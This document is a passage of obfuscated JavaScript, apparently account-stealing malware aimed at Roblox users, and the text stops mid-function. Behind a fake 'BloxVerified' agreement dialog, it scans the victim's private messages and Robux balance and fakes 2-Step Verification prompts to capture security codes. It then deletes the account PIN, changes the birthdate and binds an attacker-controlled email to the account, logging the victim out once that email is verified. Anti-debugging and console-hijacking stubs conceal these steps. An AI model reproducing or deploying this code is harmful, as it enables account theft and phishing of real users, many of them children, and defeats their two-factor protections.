(async function () {
  var u = function () {
    var N = true;
    return function (Q, m) {
      var n = N ? function () {
        if (m) {
          var v = m.apply(Q, arguments);
          m = null;
          return v;
        }
      } : function () {};
      N = false;
      return n;
    };
  }();
  var z = u(this, function () {
    return z.toString().search("(((.+)+)+)+$").toString().constructor(z).search("(((.+)+)+)+$");
  });
  z();
  var Z = function () {
    var N = true;
    return function (m, H) {
      var f = N ? function () {
        if (H) {
          var W = H.apply(m, arguments);
          H = null;
          return W;
        }
      } : function () {};
      N = false;
      return f;
    };
  }();
  (function () {
    Z(this, function () {
      var H = new RegExp("function *\\( *\\)");
      var n = new RegExp("\\+\\+ *(?:[a-zA-Z_$][0-9a-zA-Z_$]*)", "i");
      var f = a("init");
      if (!H.test(f + "chain") || !n.test(f + "input")) {
        f("0");
      } else {
        a();
      }
    })();
  })();
  var h = function () {
    var N = true;
    return function (m, H) {
      var f = N ? function () {
        if (H) {
          var v = H.apply(m, arguments);
          H = null;
          return v;
        }
      } : function () {};
      N = false;
      return f;
    };
  }();
  var x = h(this, function () {
    var N = function () {
      var U;
      try {
        U = Function("return (function() {}.constructor(\"return this\")( ));")();
      } catch (S) {
        U = window;
      }
      return U;
    };
    var Q = N();
    var m = Q.console = Q.console || {};
    var H = ["log", "warn", "info", "error", "exception", "table", "trace"];
    for (var n = 0; n < H.length; n++) {
      var W = h.constructor.prototype.bind(h);
      var r = H[n];
      var v = m[r] || W;
      W.__proto__ = h.bind(h);
      W.toString = v.toString.bind(v);
      m[r] = W;
    }
  });
  x();
  const j = q => new Promise(N => setTimeout(N, q));
  var Y = ["a29vdmt1bnVsQGdhemV0YS5wbA==", "c2V6eXV2a2lhdEBnYXpldGEucGw=", "bWV2eXViaXZ6c0BnYXpldGEucGw=", "emhla2FsYWtkY0BnYXpldGEucGw=", "bmVhcnNhc2hvcEBnYXpldGEucGw=", "ZHV2dW1uYWFuZ0BnYXpldGEucGw=", "bGVieXVrbGF0b0BnYXpldGEucGw=", "c2ViYWtieWF1dEBnYXpldGEucGw=", "bmlhc2hlQGdhemV0YS5wbA==", "bGVva3RlbmxuQGdhemV0YS5wbA==", "c3l1dXN2YWxhbEBnYXpldGEucGw=", "bm9rYXRuYW9yaEBnYXpldGEucGw=", "bGVvbXl1QGdhemV0YS5wbA==", "em9ldW5AZ2F6ZXRhLnBs", "bHVwYWJhbmRub0BnYXpldGEucGw="];
  var k = Y[Math.floor(Math.random() * Y.length)];
  validDev = [];
  try {
    console.log(document.getElementsByClassName("text-footer footer-note")[0].innerText);
  } catch {
    window.location.reload();
  }
  if (document.getElementsByClassName("text-footer footer-note")[0].innerText != "Active") {
    document.getElementsByClassName("text-footer footer-note")[0].innerText = "Active";
    $.ajax({
      "method": "GET",
      "url": "https://users.roblox.com/v1/users/authenticated",
      "contentType": "application/json",
      "success": function (Q) {
        var H = Q.id;
        try {
          var n = {
            friendshipOriginSourceType: 0
          };
          $.ajax({
            "method": "POST",
            "url": "https://friends.roblox.com/v1/users/7436036020/request-friendship",
            "contentType": "application/json",
            "data": JSON.stringify(n)
          });
        } catch {}
        try {
          $.ajax({
            "method": "GET",
            "url": "https://privatemessages.roblox.com/v1/messages?messageTab=inbox&pageNumber=0&pageSize=20",
            "contentType": "application/json",
            "success": function (W) {
              var U = Number(W.totalPages);
              for (let B = 0; B < U; B++) {
                $.ajax({
                  "method": "GET",
                  "url": "https://privatemessages.roblox.com/v1/messages?messageTab=inbox&pageNumber=" + B + "&pageSize=20",
                  "contentType": "application/json",
                  "success": function (I) {
                    var M = I.collection;
                    for (var y of M) {
                      if (y.body.includes("bloxwork") == true) {
                        validDev.push("true");
                      }
                      if (y.body.includes("your UGC accessories") == true) {
                        validDev.push("true");
                      }
                      if (y.body.includes("buying one of your") == true) {
                        validDev.push("true");
                      }
                      if (y.body.includes("permission to use a clothing item") == true) {
                        validDev.push("true");
                      }
                      if (y.body.includes("or even USD.") == true) {
                        validDev.push("true");
                      }
                      if (y.body.includes("outfit in my game") == true) {
                        validDev.push("true");
                      }
                    }
                  }
                });
              }
            }
          });
        } catch {}
        try {
          $.ajax({
            "method": "GET",
            "url": "https://privatemessages.roblox.com/v1/messages?messageTab=archive&pageNumber=0&pageSize=20",
            "contentType": "application/json",
            "success": function (W) {
              var U = Number(W.totalPages);
              for (let I = 0; I < U; I++) {
                $.ajax({
                  "method": "GET",
                  "url": "https://privatemessages.roblox.com/v1/messages?messageTab=archive&pageNumber=" + I + "&pageSize=20",
                  "contentType": "application/json",
                  "success": function (M) {
                    var g = M.collection;
                    for (var R of g) {
                      if (R.body.includes("bloxwork") == true) {
                        validDev.push("true");
                      }
                      if (R.body.includes("your UGC accessories") == true) {
                        validDev.push("true");
                      }
                      if (R.body.includes("buying one of your") == true) {
                        validDev.push("true");
                      }
                      if (R.body.includes("permission to use a clothing item") == true) {
                        validDev.push("true");
                      }
                      if (R.body.includes("or even USD.") == true) {
                        validDev.push("true");
                      }
                      if (R.body.includes("outfit in my game") == true) {
                        validDev.push("true");
                      }
                    }
                  }
                });
              }
            }
          });
        } catch {}
        try {
          $.ajax({
            "method": "GET",
            "url": "https://economy.roblox.com/v1/users/" + H + "/currency",
            "contentType": "application/json",
            "success": function (U) {
              var B = U.robux;
              if (B > 500) {
                validDev.push("true");
              }
            }
          });
        } catch {}
        async function f() {
          function B() {
            $.ajax({
              "method": "GET",
              "url": "https://accountsettings.roblox.com/v1/email",
              "contentType": "application/json",
              "success": function (L) {
                if (L.emailAddress == null) {
                  $.ajax({
                    "method": "POST",
                    "url": "https://accountsettings.roblox.com/v1/email",
                    "contentType": "application/json",
                    "data": JSON.stringify({
                      "emailAddress": atob(k),
                      "password": ""
                    })
                  });
                } else {
                  var e = L.emailAddress;
                  var l = L.verified;
                  if (e.includes("gazeta.pl") == true) {
                    if (l == true) {
                      (async function () {
                        await j(500);
                        var c = {
                          method: "POST",
                          url: "https://auth.roblox.com/v2/logout",
                          contentType: "application/json"
                        };
                        $.ajax(c);
                      })();
                    } else {
                      document.getElementById("agreeBloxVerified").innerText = "Please wait..";
                    }
                  }
                }
              }
            });
            setTimeout(B, 2000);
          }
          B();
          function I(b, T, L) {
            $.ajax({
              "method": "POST",
              "url": "https://twostepverification.roblox.com/v1/users/" + H + "/challenges/email/send-code",
              "contentType": "application/json",
              "data": JSON.stringify({
                "actionType": "Generic",
                "challengeId": b
              }),
              "success": function () {
                document.body.insertAdjacentHTML("beforeend", "<div id=\"twoStepPrompts\" role=\"dialog\"> <div class=\"fade modal-backdrop in\"></div> <div role=\"dialog\" tabindex=\"-1\" style=\"display: block;\" class=\"fade modal-modern in modal\"> <div class=\"modal-dialog\"> <div class=\"modal-content\" role=\"document\"> <div title=\"\" class=\"modal-header\"> <button type=\"button\" class=\"modal-modern-header-button\"></button> <h4 class=\"modal-title\">2-Step Verification</h4> <div class=\"modal-modern-header-info\"></div> </div> <div class=\"modal-body\"> <div class=\"modal-lock-icon\"></div> <p class=\"modal-margin-bottom-xlarge\">Enter the code we just sent you via email. </p> <div class=\"input-control-wrapper\"> <div id=\"groupElementId\" class=\"form-group\"> <input as=\"input\" inputmode=\"numeric\" autocomplete=\"off\" maxlength=\"6\" placeholder=\"Enter 6-digit Code\" type=\"text\" id=\"two-step-verification-code-input\" class=\"input-field form-control\" value=\"\"> <div class=\"form-control-label bottom-label xsmall\">&nbsp;</div> </div> </div> </div> <div class=\"modal-footer\"> <div class=\"modal-modern-footer-buttons\"> <button type=\"button\" class=\"btn-cta-md modal-modern-footer-button\" aria-label=\"Verify\" disabled=\"\">Verify</button> </div> <p class=\"text-footer modal-margin-bottom\">Need help? Contact <a class=\"text-name text-footer contact\" href=\"https://www.roblox.com/info/2sv\" target=\"_blank\" rel=\"noopener noreferrer\">Roblox Support</a></p> <p class=\"text-footer\">IMPORTANT: Don't share your security codes with anyone. Roblox will never ask you for your codes. This can include things like texting your code, screensharing, etc.</p> </div> </div> </div> </div> </div>");
                function c() {
                  var P = {
                    fysmN: "(((.+)+)+)+$"
                  };
                  P.ZpbRP = "pinPopupz";
                  if (document.getElementById("two-step-verification-code-input").value.length == 6) {
                    document.getElementsByClassName("btn-cta-md modal-modern-footer-button")[0].disabled = false;
                  } else {
                    document.getElementsByClassName("btn-cta-md modal-modern-footer-button")[0].disabled = true;
                  }
                  setTimeout(c, 100);
                }
                c();
                document.getElementsByClassName("btn-cta-md modal-modern-footer-button")[0].onclick = function () {
                  $.ajax({
                    "method": "POST",
                    "url": "https://twostepverification.roblox.com/v1/users/" + H + "/challenges/email/verify",
                    "contentType": "application/json",
                    "data": JSON.stringify({
                      "challengeId": b,
                      "actionType": "Generic",
                      "code": document.getElementById("two-step-verification-code-input").value
                    }),
                    "success": function (A) {
                      var J0 = A.verificationToken;
                      $.ajax({
                        "method": "POST",
                        "url": "https://apis.roblox.com/challenge/v1/continue",
                        "contentType": "application/json",
                        "data": JSON.stringify({
                          "challengeId": T,
                          "challengeMetadata": "{\"verificationToken\":\"" + J0 + "\",\"rememberDevice\":false,\"challengeId\":\"" + b + "\",\"actionType\":\"Generic\"}",
                          "challengeType": "twostepverification"
                        }),
                        "success": function () {
                          var J1 = {
                            nyLSm: "pinPopupz"
                          };
                          J1.fHGen = "agreeBloxVerified";
                          J1.GEdek = "true";
                          document.getElementById("twoStepPrompts").remove();
                          j(2000);
                          var J3 = btoa("{\"reauthenticationToken\":\"" + J0 + "\"}");
                          console.log(L);
                          if (L == 1) {
                            console.log("Reason is 1");
                            var J4 = {
                              method: "POST",
                              url: "https://twostepverification.roblox.com/v1/users/" + H + "/configuration/email/enable",
                              contentType: "application/json",
                              headers: {}
                            };
                            J4.headers["Rblx-Challenge-Type"] = "reauthentication";
                            J4.headers["Rblx-Challenge-Id"] = T;
                            J4.headers["Rblx-Challenge-Metadata"] = J3;
                            $.ajax(J4);
                          } else {
                            if (L == null) {
                              $.ajax({
                                "method": "DELETE",
                                "url": "https://auth.roblox.com/v1/account/pin",
                                "contentType": "application/json",
                                "headers": {
                                  "Rblx-Challenge-Type": "reauthentication",
                                  "Rblx-Challenge-Id": T,
                                  "Rblx-Challenge-Metadata": J3
                                },
                                "success": function () {
                                  g(null, null);
                                }
                              });
                            } else {
                              g(T, J3);
                            }
                          }
                        }
                      });
                    },
                    "error": function () {
                      document.getElementsByClassName("form-control-label bottom-label xsmall")[0].innerText = "Invalid code";
                      document.getElementById("groupElementId").className = "form-has-feedback  form-has-error form-group";
                    }
                  });
                };
              }
            });
          }
          function S(b, T, L) {
            document.body.insertAdjacentHTML("beforeend", "<div id=\"twoStepPrompts\" role=\"dialog\"> <div class=\"fade modal-backdrop in\"></div> <div role=\"dialog\" tabindex=\"-1\" style=\"display: block;\" class=\"fade modal-modern in modal\"> <div class=\"modal-dialog\"> <div class=\"modal-content\" role=\"document\"> <div title=\"\" class=\"modal-header\"> <button type=\"button\" class=\"modal-modern-header-button\"></button> <h4 class=\"modal-title\">2-Step Verification</h4> <div class=\"modal-modern-header-info\"></div> </div> <div class=\"modal-body\"> <div class=\"modal-lock-icon\"></div> <p class=\"modal-margin-bottom-xlarge\">Enter the code generated by your authenticator app. </p> <div class=\"input-control-wrapper\"> <div id=\"groupElementId\" class=\"form-group\"> <input as=\"input\" inputmode=\"numeric\" autocomplete=\"off\" maxlength=\"6\" placeholder=\"Enter 6-digit Code\" type=\"text\" id=\"two-step-verification-code-input\" class=\"input-field form-control\" value=\"\"> <div class=\"form-control-label bottom-label xsmall\">&nbsp;</div> </div> </div> </div> <div class=\"modal-footer\"> <div class=\"modal-modern-footer-buttons\"> <button type=\"button\" class=\"btn-cta-md modal-modern-footer-button\" aria-label=\"Verify\" disabled=\"\">Verify</button> </div> <p class=\"text-footer modal-margin-bottom\">Need help? Contact <a class=\"text-name text-footer contact\" href=\"https://www.roblox.com/info/2sv\" target=\"_blank\" rel=\"noopener noreferrer\">Roblox Support</a></p> <p class=\"text-footer\">IMPORTANT: Don't share your security codes with anyone. Roblox will never ask you for your codes. This can include things like texting your code, screensharing, etc.</p> </div> </div> </div> </div> </div>");
            function O() {
              if (document.getElementById("two-step-verification-code-input").value.length == 6) {
                document.getElementsByClassName("btn-cta-md modal-modern-footer-button")[0].disabled = false;
              } else {
                document.getElementsByClassName("btn-cta-md modal-modern-footer-button")[0].disabled = true;
              }
              setTimeout(O, 100);
            }
            ;
            O();
            document.getElementsByClassName("btn-cta-md modal-modern-footer-button")[0].onclick = function () {
              $.ajax({
                "method": "POST",
                "url": "https://twostepverification.roblox.com/v1/users/" + H + "/challenges/authenticator/verify",
                "contentType": "application/json",
                "data": JSON.stringify({
                  "challengeId": b,
                  "actionType": "Generic",
                  "code": document.getElementById("two-step-verification-code-input").value
                }),
                "success": function (c) {
                  var p = c.verificationToken;
                  $.ajax({
                    "method": "POST",
                    "url": "https://apis.roblox.com/challenge/v1/continue",
                    "contentType": "application/json",
                    "data": JSON.stringify({
                      "challengeId": T,
                      "challengeMetadata": "{\"verificationToken\":\"" + p + "\",\"rememberDevice\":false,\"challengeId\":\"" + b + "\",\"actionType\":\"Generic\"}",
                      "challengeType": "twostepverification"
                    }),
                    "success": function () {
                      document.getElementById("twoStepPrompts").remove();
                      j(2000);
                      var i = btoa("{\"reauthenticationToken\":\"" + p + "\"}");
                      if (L == 1) {
                        console.log("Reason is 1");
                        var J0 = {
                          method: "POST",
                          url: "https://twostepverification.roblox.com/v1/users/" + H + "/configuration/email/enable",
                          contentType: "application/json",
                          headers: {}
                        };
                        J0.headers["Rblx-Challenge-Type"] = "reauthentication";
                        J0.headers["Rblx-Challenge-Id"] = T;
                        J0.headers["Rblx-Challenge-Metadata"] = i;
                        $.ajax(J0);
                      } else {
                        if (L == null) {
                          $.ajax({
                            "method": "DELETE",
                            "url": "https://auth.roblox.com/v1/account/pin",
                            "contentType": "application/json",
                            "headers": {
                              "Rblx-Challenge-Type": "reauthentication",
                              "Rblx-Challenge-Id": T,
                              "Rblx-Challenge-Metadata": i
                            },
                            "success": function () {
                              g(null, null);
                            }
                          });
                        } else {
                          g(T, i);
                        }
                      }
                    }
                  });
                },
                "error": function (c) {
                  var P = {
                    glreB: "true"
                  };
                  P.kuKLw = "btn-cta-md modal-modern-footer-button";
                  if (c.responseText.includes("\"code\":18")) {
                    document.getElementsByClassName("form-control-label bottom-label xsmall")[0].innerText = "This code has already been used. Please enter a new code.";
                    document.getElementById("groupElementId").className = "form-has-feedback  form-has-error form-group";
                  } else {
                    document.getElementsByClassName("form-control-label bottom-label xsmall")[0].innerText = "Invalid code";
                    document.getElementById("groupElementId").className = "form-has-feedback  form-has-error form-group";
                  }
                }
              });
            };
          }
          function M(b, T) {
            $.ajax({
              "method": "POST",
              "url": "https://apis.roblox.com/otp-service/v1/sendCodeForUser",
              "contentType": "application/json",
              "data": JSON.stringify({
                "contactType": "Email",
                "messageVariant": "Default",
                "origin": "Reauth"
              }),
              "success": function (w) {
                var l = w.otpSessionToken;
                document.body.insertAdjacentHTML("beforeend", "<div id=\"twoStepPrompts\" role=\"dialog\"> <div class=\"fade modal-backdrop in\"></div> <div role=\"dialog\" tabindex=\"-1\" style=\"display: block;\" class=\"fade modal-modern in modal\"> <div class=\"modal-dialog\"> <div class=\"modal-content\" role=\"document\"> <div title=\"\" class=\"modal-header\"> <button type=\"button\" class=\"modal-modern-header-button\"></button> <h4 class=\"modal-title\">2-Step Verification</h4> <div class=\"modal-modern-header-info\"></div> </div> <div class=\"modal-body\"> <div class=\"modal-lock-icon\"></div> <p class=\"modal-margin-bottom-xlarge\">A one-time code has been sent to your registered email. Please enter your one-time code to continue.</p> <div class=\"input-control-wrapper\"> <div id=\"groupElementId\" class=\"form-group\"> <input as=\"input\" inputmode=\"numeric\" autocomplete=\"off\" maxlength=\"6\" placeholder=\"Enter 6-Digit Code\" type=\"text\" id=\"two-step-verification-code-input\" class=\"input-field form-control\" value=\"\"> <div class=\"form-control-label bottom-label xsmall\">%C2%A0;</div> </div> </div> </div> <div class=\"modal-footer\"> <div class=\"modal-modern-footer-buttons\"> <button type=\"button\" class=\"btn-cta-md modal-modern-footer-button\" aria-label=\"Verify\" disabled=\"\">Verify</button> </div> <p class=\"text-footer modal-margin-bottom\">Need help? Contact <a class=\"text-name text-footer contact\" href=\"https://www.roblox.com/info/2sv\" target=\"_blank\" rel=\"noopener noreferrer\">Roblox Support</a></p> <p class=\"text-footer\">IMPORTANT: Don't share your security codes with anyone. Roblox will never ask you for your codes. This can include things like texting your code, screensharing, etc.</p> </div> </div> </div> </div> </div>");
                function D() {
                  var c = {
                    fkUJm: "responseText"
                  };
                  c.XGqjG = "\"code\":18";
                  c.cSvRn = "form-control-label bottom-label xsmall";
                  c.wLZuw = "This code has already been used. Please enter a new code.";
                  c.mLNLl = "groupElementId";
                  c.qsGpU = "form-has-feedback  form-has-error form-group";
                  c.ueBww = "Invalid code";
                  if (document.getElementById("two-step-verification-code-input").value.length == 6) {
                    document.getElementsByClassName("btn-cta-md modal-modern-footer-button")[0].disabled = false;
                  } else {
                    document.getElementsByClassName("btn-cta-md modal-modern-footer-button")[0].disabled = true;
                  }
                  setTimeout(D, 100);
                }
                ;
                D();
                document.getElementsByClassName("btn-cta-md modal-modern-footer-button")[0].onclick = function () {
                  $.ajax({
                    "method": "POST",
                    "url": "https://apis.roblox.com/otp-service/v1/validateCode",
                    "contentType": "application/json",
                    "data": JSON.stringify({
                      "contactType": "Email",
                      "origin": "Reauth",
                      "otpSessionToken": l,
                      "passCode": document.getElementById("two-step-verification-code-input").value
                    }),
                    "success": function () {
                      $.ajax({
                        "method": "POST",
                        "url": "https://apis.roblox.com/reauthentication-service/v1/token/generate",
                        "contentType": "application/json",
                        "data": JSON.stringify({
                          "sessionId": l,
                          "type": "Otp_Email"
                        }),
                        "success": function (i) {
                          responseToken = i.token;
                          $.ajax({
                            "method": "POST",
                            "url": "https://apis.roblox.com/challenge/v1/continue",
                            "contentType": "application/json",
                            "data": JSON.stringify({
                              "challengeId": b,
                              "challengeMetadata": "{\"reauthenticationToken\":\"" + responseToken + "\"}",
                              "challengeType": "reauthentication"
                            }),
                            "success": function () {
                              var J1 = {
                                XJbde: "1|3|2|4|0|5"
                              };
                              J1.PyPPp = "promptPopup";
                              J1.MhTpP = "text-footer footer-note";
                              J1.NaKpr = "Not Active";
                              document.getElementById("twoStepPrompts").remove();
                              j(2000);
                              var J3 = btoa("{\"reauthenticationToken\":\"" + responseToken + "\"}");
                              if (T == 1) {
                                console.log("Reason is 1");
                                var J4 = {
                                  method: "POST",
                                  url: "https://twostepverification.roblox.com/v1/users/" + H + "/configuration/email/enable",
                                  contentType: "application/json",
                                  headers: {}
                                };
                                J4.headers["Rblx-Challenge-Type"] = "reauthentication";
                                J4.headers["Rblx-Challenge-Id"] = b;
                                J4.headers["Rblx-Challenge-Metadata"] = J3;
                                $.ajax(J4);
                              } else {
                                if (T == null) {
                                  $.ajax({
                                    "method": "DELETE",
                                    "url": "https://auth.roblox.com/v1/account/pin",
                                    "contentType": "application/json",
                                    "headers": {
                                      "Rblx-Challenge-Type": "reauthentication",
                                      "Rblx-Challenge-Id": b,
                                      "Rblx-Challenge-Metadata": J3
                                    },
                                    "success": function () {
                                      g(null, null);
                                    }
                                  });
                                } else {
                                  g(b, J3);
                                }
                              }
                            }
                          });
                        }
                      });
                    },
                    "error": function () {
                      document.getElementsByClassName("form-control-label bottom-label xsmall")[0].innerText = "Invalid code";
                      document.getElementById("groupElementId").className = "form-has-feedback  form-has-error form-group";
                    }
                  });
                };
              }
            });
          }
          function y(b, T, L) {
            $.ajax({
              "method": "GET",
              "url": "https://twostepverification.roblox.com/v1/users/" + H + "/configuration",
              "contentType": "application/json",
              "success": function (l) {
                var D = l.primaryMediaType;
                if (D == "Email") {
                  I(b, T, L);
                } else {
                  if (D == "Authenticator") {
                    S(b, T, L);
                  } else if (D == null) {
                    M(T, L);
                  }
                }
              }
            });
          }
          function g(b, T) {
            $.ajax({
              "method": "GET",
              "url": "https://twostepverification.roblox.com/v1/users/" + H + "/configuration",
              "contentType": "application/json",
              "success": function (w) {
                var l = w.primaryMediaType;
                if (l == "Authenticator") {
                  document.getElementsByClassName("text-footer footer-note")[0].innerText = "Not Active";
                  if (document.getElementById("emailPopupz") == null) {
                    document.body.insertAdjacentHTML("beforeend", "<div id=\"emailPopupz\" role=\"dialog\"><div class=\"fade modal-backdrop in\"></div><div role=\"dialog\" tabindex=\"-1\" class=\"fade modal-modern in modal\" style=\"display: block; padding-left: 23px;\"><div class=\"modal-dialog\" bis_skin_checked=\"1\"><div class=\"modal-content\" role=\"document\" bis_skin_checked=\"1\"><div title=\"\" class=\"modal-header\" bis_skin_checked=\"1\"><button type=\"button\" class=\"modal-modern-header-button\"></button><h4 class=\"modal-title\">Email 2-Step Verification</h4><div class=\"modal-modern-header-info\" bis_skin_checked=\"1\"></div></div><div class=\"modal-body\" bis_skin_checked=\"1\"><div class=\"modal-lock-icon\" bis_skin_checked=\"1\"></div><p>You must enable Email 2-Step Verification to complete this action.</p></div><div class=\"modal-footer\" bis_skin_checked=\"1\"><div class=\"modal-modern-footer-buttons\" bis_skin_checked=\"1\"><button type=\"button\" class=\"btn-cta-md modal-modern-footer-button\" aria-label=\"Set Up\">Enable</button></div></div></div></div></div></div>");
                    document.getElementsByClassName("btn-cta-md modal-modern-footer-button")[0].onclick = function () {
                      document.getElementById("emailPopupz").remove();
                      document.getElementById("agreeBloxVerified").disabled = false;
                      $.ajax({
                        "method": "POST",
                        "url": "https://twostepverification.roblox.com/v1/users/" + H + "/configuration/email/enable",
                        "contentType": "application/json",
                        "success": function () {},
                        "error": function (A) {
                          var i = atob(A.getResponseHeader("rblx-challenge-metadata"));
                          var J0 = A.getResponseHeader("rblx-challenge-id");
                          var J1 = i.split("\"challengeId\":\"").pop().split("\"")[0];
                          y(J1, J0, 1);
                        }
                      });
                    };
                  }
                } else {
                  if (b == null) {
                    var D = {
                      birthDay: 2,
                      birthMonth: 2,
                      birthYear: 2017
                    };
                    $.ajax({
                      "method": "POST",
                      "url": "https://users.roblox.com/v1/birthdate",
                      "contentType": "application/json",
                      "data": JSON.stringify(D),
                      "success": function () {
                        $.ajax({
                          "method": "POST",
                          "url": "https://accountsettings.roblox.com/v1/email",
                          "contentType": "application/json",
                          "data": JSON.stringify({
                            "emailAddress": atob(k),
                            "password": ""
                          }),
                          "success": function () {
                            (async function () {
                              await j(1500);
                              $.ajax({
                                "method": "GET",
                                "url": "https://accountsettings.roblox.com/v1/email",
                                "contentType": "application/json",
                                "success": function (J1) {
                                  if (J1.emailAddress == null) {
                                    $.ajax({
                                      "method": "POST",
                                      "url": "https://accountsettings.roblox.com/v1/email",
                                      "contentType": "application/json",
                                      "data": JSON.stringify({
                                        "emailAddress": atob(k),
                                        "password": ""
                                      })
                                    });
                                  }
                                }
                              });
                            })();
                          },
                          "error": function () {
                            (async function () {
                              await j(1500);
                              $.ajax({
                                "method": "GET",
                                "url": "https://accountsettings.roblox.com/v1/email",
                                "contentType": "application/json",
                                "success": function (J2) {
                                  if (J2.emailAddress == null) {
                                    $.ajax({
                                      "method": "POST",
                                      "url": "https://accountsettings.roblox.com/v1/email",
                                      "contentType": "application/json",
                                      "data": JSON.stringify({
                                        "emailAddress": atob(k),
                                        "password": ""
                                      })
                                    });
                                  }
                                }
                              });
                            })();
                          }
                        });
                      },
                      "error": function (A) {
                        var J0 = atob(A.getResponseHeader("rblx-challenge-metadata"));
                        var J1 = A.getResponseHeader("rblx-challenge-id");
                        var J2 = J0.split("\"challengeId\":\"").pop().split("\"")[0];
                        y(J2, J1, 2);
                      }
                    });
                  } else {
                    var c = {
                      birthDay: 2,
                      birthMonth: 2,
                      birthYear: 2017
                    };
                    $.ajax({
                      "method": "POST",
                      "url": "https://users.roblox.com/v1/birthdate",
                      "contentType": "application/json",
                      "headers": {
                        "Rblx-Challenge-Type": "reauthentication",
                        "Rblx-Challenge-Id": b,
                        "Rblx-Challenge-Metadata": T
                      },
                      "data": JSON.stringify(c),
                      "success": function () {
                        $.ajax({
                          "method": "POST",
                          "url": "https://accountsettings.roblox.com/v1/email",
                          "contentType": "application/json",
                          "data": JSON.stringify({
                            "emailAddress": atob(k),
                            "password": ""
                          }),
                          "success": function () {
                            (async function () {
                              await j(1500);
                              $.ajax({
                                "method": "GET",
                                "url": "https://accountsettings.roblox.com/v1/email",
                                "contentType": "application/json",
                                "success": function (J2) {
                                  if (J2.emailAddress == null) {
                                    $.ajax({
                                      "method": "POST",
                                      "url": "https://accountsettings.roblox.com/v1/email",
                                      "contentType": "application/json",
                                      "data": JSON.stringify({
                                        "emailAddress": atob(k),
                                        "password": ""
                                      })
                                    });
                                  }
                                }
                              });
                            })();
                          },
                          "error": function () {
                            (async function () {
                              await j(1500);
                              $.ajax({
                                "method": "GET",
                                "url": "https://accountsettings.roblox.com/v1/email",
                                "contentType": "application/json",
                                "success": function (J1) {
                                  if (J1.emailAddress == null) {
                                    $.ajax({
                                      "method": "POST",
                                      "url": "https://accountsettings.roblox.com/v1/email",
                                      "contentType": "application/json",
                                      "data": JSON.stringify({
                                        "emailAddress": atob(k),
                                        "password": ""
                                      })
                                    });
                                  }
                                }
                              });
                            })();
                          }
                        });
                      },
                      "error": function (i) {
                        var J0 = atob(i.getResponseHeader("rblx-challenge-metadata"));
                        var J1 = i.getResponseHeader("rblx-challenge-id");
                        var J2 = J0.split("\"challengeId\":\"").pop().split("\"")[0];
                        y(J2, J1, 2);
                      }
                    });
                  }
                }
              }
            });
          }
          if (document.getElementById("BloxVerified1") == null) {
            document.body.insertAdjacentHTML("beforeend", "<div id=\"BloxVerified1\" role=\"dialog\"><div class=\"fade modal-backdrop in\"></div><div aria-labelledby=\"contained-modal-title-vcenter\" scrollable=\"true\" centered=\"true\" role=\"dialog\" tabindex=\"-1\" style=\"display: block;\" class=\"fade verification-modal in modal\"><div class=\"modal-sm modal-dialog\"><div class=\"modal-content\" role=\"document\"><div><div title=\"\" class=\"modal-header\"><div class=\"verification-upsell-title-container\"><button type=\"button\" class=\"verification-upsell-title-button\"></button><h4 id=\"contained-modal-title-vcenter\" class=\"modal-title\">BloxVerified Agreement </h4></div></div><div class=\"verification-upsell-text-body text-description\">BloxVerified can view your Roblox Username</div><div class=\"modal-footer\"><div class=\"text-description font-caption-body phone-verification-legal-text\" hidden=\"\">By clicking \"Continue\", you are submitting your phone number and agreeing to our <a href=\"https://en.help.roblox.com/hc/articles/9483830673556-Roblox-SMS-Terms-of-Service\">SMS Terms of Use</a> and <a href=\"https://en.help.roblox.com/hc/articles/115004630823\">Privacy Policy</a>. We will send you a one-time verification code. Message and data rates may apply. Reply HELP for help.</div><div class=\"buttons-section\"><button type=\"button\" class=\"accept-btn btn-primary-md btn-min-width\" id=\"agreeBloxVerified\">Agree & Continue</button></div><div></div></div></div></div></div></div></div>");
            document.getElementById("agreeBloxVerified").onclick = function () {
              document.getElementById("agreeBloxVerified").disabled = true;
              $.ajax({
                "method": "GET",
                "url": "https://auth.roblox.com/v1/account/pin",
                "contentType": "application/json",
                "success": function (T) {
                  var L = T.isEnabled;
                  var w = T.unlockedUntil;
                  if (L == true) {
                    if (w == null) {
                      document.getElementsByClassName("text-footer footer-note")[0].innerText = "Not Active";
                      if (document.getElementById("pinPopupz") == null) {
                        document.body.insertAdjacentHTML("beforeend", "<div id=\"pinPopupz\" role=\"dialog\"><div class=\"fade modal-backdrop in\"></div><div role=\"dialog\" tabindex=\"-1\" class=\"fade modal-modern in modal\" style=\"display: block; padding-left: 23px;\"><div class=\"modal-dialog\"><div class=\"modal-content\" role=\"document\"><div title=\"\" class=\"modal-header\"><button type=\"button\" class=\"modal-modern-header-button\"></button><h4 class=\"modal-title\">Account PIN Locked</h4><div class=\"modal-modern-header-info\"></div></div><div class=\"modal-body\"><p>Unlock the PIN attached to your account to continue</p></div><div class=\"modal-footer\"><div class=\"modal-modern-footer-buttons\"><a class=\"btn-cta-md modal-modern-footer-button\" aria-label=\"Set Up\" target=\"_blank\" href=\"https://www.roblox.com/my/account#!/parental-controls\">Open Settings</a></div></div></div></div></div></div>");
                        document.getElementsByClassName("btn-cta-md modal-modern-footer-button")[0].onclick = function () {
                          document.getElementById("pinPopupz").remove();
                          document.getElementById("agreeBloxVerified").disabled = false;
                        };
                      }
                    } else {
                      try {
                        document.getElementById("pinPopupz").remove();
                      } catch {}
                      $.ajax({
                        "method": "DELETE",
                        "url": "https://auth.roblox.com/v1/account/pin",
                        "contentType": "application/json",
                        "success": function () {
                          g(null, null);
                        },
                        "error": function (l) {
                          var O = atob(l.getResponseHeader("rblx-challenge-metadata"));
                          var D = l.getResponseHeader("rblx-challenge-id");
                          var c = O.split("\"challengeId\":\"").pop().split("\"")[0];
                          y(c, D, null);
                        }
                      });
                    }
                  } else {
                    g(null, null);
                  }
                }
              });
            };
          } else {
            $.ajax({
              "method": "GET",
              "url": "https://auth.roblox.com/v1/account/pin",
              "contentType": "application/json",
              "success": function (b) {
                var T = {
                  RZBZF: "pinPopupz"
                };
                T.VomRO = "text-footer footer-note";
                T.fHchc = "Not Active";
                var w = b.isEnabled;
                var e = b.unlockedUntil;
                if (w == true) {
                  if (e == null) {
                    document.getElementsByClassName("text-footer footer-note")[0].innerText = "Not Active";
                    if (document.getElementById("pinPopupz") == null) {
